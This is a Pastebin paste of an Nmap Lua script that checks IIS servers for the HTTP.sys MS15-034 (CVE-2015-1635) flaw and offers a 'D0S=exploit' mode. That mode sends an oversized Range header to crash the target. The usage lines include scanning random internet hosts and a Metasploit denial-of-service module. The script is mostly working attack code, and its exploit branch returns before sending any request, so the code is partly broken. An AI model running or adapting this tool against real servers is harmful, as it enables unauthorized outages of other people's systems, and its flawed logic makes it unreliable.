SHARE
TWEET

ms15-034.nse (http.sys vulnerability check/exploit)

r00t-3xp10it Jun 15th, 2015 (edited) 854 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -- Original nse module written by: DigitalStroopwafel
  2. -- Port nmap nse script to: /usr/share/nmap/scripts
  3. -- Update database: sudo nmap --script-updatedb
  4. -- Usage: sudo nmap --script-help ms15-034.nse
  5. -- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  6. -- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  7.  
  8.  
  9. -- Dependencies (Lua libs)
  10. -- all dependencies are satisfied (nmap default installation)..
  11. local http = require('http')
  12. local string = require('string')
  13. local shortport = require('shortport')
  14. local stdnse = require ('stdnse')
  15. local vulns = require ('vulns')
  16.  
  17.  
  18. description = [[
  19.  
  20. author: DigitalStroopwafel, r00t-3xp10it
  21. Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit
  22. it using script args (--script-args D0S=exploit) or we can scan further using another
  23. argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8,
  24. 8.1, Windows Server 2008 R2, 2012 and 2012R2.
  25.  
  26. Some syntax examples:
  27. nmap -sV -Pn -p 80 --script vuln <target>
  28. nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  29. nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri <target>
  30. nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  31. nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  32. nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log
  33. ]]
  34.  
  35. ---
  36. -- @usage
  37. -- nmap --script-help ms15-034.nse
  38. -- nmap -sV -Pn -p 80 --script vuln <target>
  39. -- nmap -sS -Pn -p 80 --script ms15-034.nse <target>
  40. -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ <target>
  41. -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  42. -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  43. -- @output
  44. -- PORT   STATE SERVICE
  45. -- 80/tcp open  http
  46. -- |_ms15-034: http.sys its Vulnerable
  47. -- |   State: VULNERABLE
  48. -- |     IDs: CVE-2015-1635
  49. -- |     Response: 416 (exploitable)
  50. -- |     Disclosure date: 2015-06-17
  51. -- |     Author: DigitalStroopwafel(module)
  52. -- |             r00t-3xp10it(review)
  53. -- |
  54. -- |     Description:
  55. -- |     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on
  56. -- |     HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,
  57. -- |     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.
  58. -- |     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>
  59. -- |     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd
  60. -- |
  61. -- |     References:
  62. -- |     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
  63. -- |     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
  64. -- |     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
  65. -- |_
  66. -- @args ms15-034.uri URI to use in request. Default: /
  67. -- @args ms15-034.D0S exploit the Denial-Of-Service condition
  68. ---
  69.  
  70.  
  71. author = "DigitalStroopwafel, r00t-3xp10it"
  72. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  73. categories = {"vuln", "dos"}
  74.  
  75.  
  76.  
  77. -- THE RULES SECTION --
  78. -- portrule = shortport.http [added port number and service to portrule]
  79. portrule = shortport.port_or_service({80, 443, 631, 5800}, "http, https, ipp, vnc", "tcp", "open")
  80. -- local uri = "/" [updated to use script arguments (anotheruri)]
  81. local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
  82.  
  83.  
  84. -- THE ACTION SECTION --
  85. action = function(host, port)
  86. local options = {header={}}
  87. options['header']['User-Agent'] = "Mozilla/5.0 (compatible; EvilMonkey)"
  88. options['header']['Host'] = stdnse.generate_random_string(8)
  89.  
  90.  
  91. -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3'
  92. -- change this script range byte from "0-" to "18-" to exploit D0S
  93. -- using script args to run denial-of-service or scanning for vulnerability
  94. local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S")
  95.   if (D0S == "exploit") then
  96.     options['header']['Range'] = "bytes=18-18446744073709551615"
  97.     return "Executing Denial-Of-Service Condition...\nstatus  : please ping target to comfirm tango down..."
  98.   else
  99.     options['header']['Range'] = "bytes=0-18446744073709551615"
  100. end
  101.  
  102.  
  103. -- get response from target website
  104. local response = http.get(host, port, uri, options)
  105. local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
  106.  
  107. -- display target response (script output)
  108. if ( title == "Requested Range Not Satisfiable" ) then
  109.   return "http.sys its Vulnerable\n   State: VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (exploitable)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n     Description:\n     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n     on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>\n     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n     References:\n     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n"
  110.  
  111. else
  112.  
  113.   return "http.sys not Vulnerable\n   State: NOT VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (we need: 416)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n"
  114.  
  115.   end
  116. end
RAW Paste Data
Top